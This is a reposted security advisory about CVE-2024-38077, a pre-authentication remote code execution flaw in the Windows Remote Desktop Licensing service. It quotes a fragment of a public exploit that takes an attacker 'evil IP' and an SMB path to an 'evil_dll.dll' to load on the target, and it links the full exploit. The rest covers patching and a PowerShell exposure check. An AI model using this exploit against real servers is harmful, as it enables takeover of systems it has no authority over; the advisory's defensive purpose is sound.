Impact:
The vulnerability lies in the Windows Remote Desktop Licensing service (RDL). An attacker needs no preconditions and no user interaction, and can directly obtain the highest privileges on the server and perform arbitrary operations. It affects every version of Windows Server from 2000 through 2025 and has existed for close to 30 years.
The vulnerability can be exploited reliably and used for remote control, ransomware, worms and the like; its destructive potential is enormous, and an attacker can achieve remote code execution without any privileges at all.
Preconditions:
Windows Remote Desktop Licensing (RDL) is enabled
Vulnerability check exp:
Only a code fragment is published here; the full code is available on GitHub for those who need it.
Source: https://github.com/qi4L/CVE-2024-38077/tree/master
import struct, hashlib, argparse
from time import sleep
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL, NDR
from impacket.dcerpc.v5.dtypes import BOOL, ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, LPSTR, \
    PUINT, WCHAR
from impacket.uuid import uuidtup_to_bin
from Cryptodome.Util.number import bytes_to_long
from wincrypto import CryptEncrypt, CryptImportKey

UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0"))
TRY_TIMES = 3
SLEEP_TIME = 210
DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE"

dce = None
rpctransport = None
ctx_handle = None
handle_lists = []
leak_idx = 0
heap_base = 0
ntdll_base = 0
peb_base = 0
pe_base = 0
rpcrt4_base = 0
kernelbase_base = 0

BBYTE = UCHAR

if __name__ == '__main__':
    parse = argparse.ArgumentParser(description=DESCRIPTION)
    parse.add_argument("--target_ip", type=str, required=True, help="Target IP, eg: 192.168.120.1")
    parse.add_argument("--evil_ip", type=str, required=True, help="Evil IP, eg: 192.168.120.2")
    parse.add_argument("--evil_dll_path", type=str, required=False, default="\\smb\\evil_dll.dll", help="Evil dll path, eg: \\smb\\evil_dll.dll")
    parse.add_argument("--check_vuln_exist", type=bool, required=False, default=False, help="Check vulnerability exist before exploit")
    args = parse.parse_args()
    pwn(args.target_ip, args.evil_ip, args.evil_dll_path, args.check_vuln_exist)
Remediation:
Microsoft has released an official fix for this vulnerability; apply the patch.
Self-check:
Check the system version
Open "Run", type "winver" and click OK, then check whether the reported system version is affected by this vulnerability.
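The self-check above is a manual version lookup. The script below is an added example (not part of the original post or of the GitHub project it links to) that does the same inventory from an elevated PowerShell prompt on the server itself: it records the OS build, checks whether the host is a server SKU, checks whether the Remote Desktop Licensing service (the precondition named above) is installed and running, and looks for the update. It assumes the service name 'TermServLicensing' and the role-service name 'RDS-Licensing'; the KB number is a placeholder to be taken from Microsoft's advisory for CVE-2024-38077.

```powershell
# Added example: inventory the preconditions named in the post on the local server.
# Assumptions: service name 'TermServLicensing' (display name "Remote Desktop Licensing"),
# role-service name 'RDS-Licensing'; the KB id below is a placeholder, not a real value.

$os = Get-CimInstance -ClassName Win32_OperatingSystem

# ProductType: 1 = workstation, 2 = domain controller, 3 = server
$isServer = $os.ProductType -ne 1

# Is the RD Licensing service present, and is it running right now?
$svc = Get-Service -Name 'TermServLicensing' -ErrorAction SilentlyContinue
$rdlInstalled = $null -ne $svc
$rdlRunning = $rdlInstalled -and ($svc.Status -eq 'Running')

# On server SKUs, also ask Server Manager whether the licensing role service is installed
$roleInstalled = $false
if ($isServer -and (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue)) {
    $feat = Get-WindowsFeature -Name 'RDS-Licensing' -ErrorAction SilentlyContinue
    $roleInstalled = ($null -ne $feat) -and $feat.Installed
}

# Replace the placeholder with the KB listed for this OS in the advisory for CVE-2024-38077.
$kb = 'KB<from-advisory>'   # placeholder
$patched = $null -ne (Get-HotFix -Id $kb -ErrorAction SilentlyContinue)

[PSCustomObject]@{
    ComputerName      = $env:COMPUTERNAME
    OSCaption         = $os.Caption      # same information winver shows
    OSBuild           = $os.BuildNumber
    IsServerSKU       = $isServer
    RDLServiceFound   = $rdlInstalled
    RDLServiceRunning = $rdlRunning
    RDLRoleInstalled  = $roleInstalled
    PatchFound        = $patched
    Exposed           = $isServer -and $rdlRunning -and -not $patched
}
```

A later cumulative update supersedes the July 2024 one and may not show the original KB in Get-HotFix, so when PatchFound is false also compare OSBuild against the fixed build listed in the advisory before treating the host as exposed. Hosts where RDLServiceFound is true but the service is stopped and the role is not needed are candidates for removing the role service outright.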
Originally published on the WeChat public account 信安王子: windows nuclear-grade RCE vulnerability (CVE-2024-38077)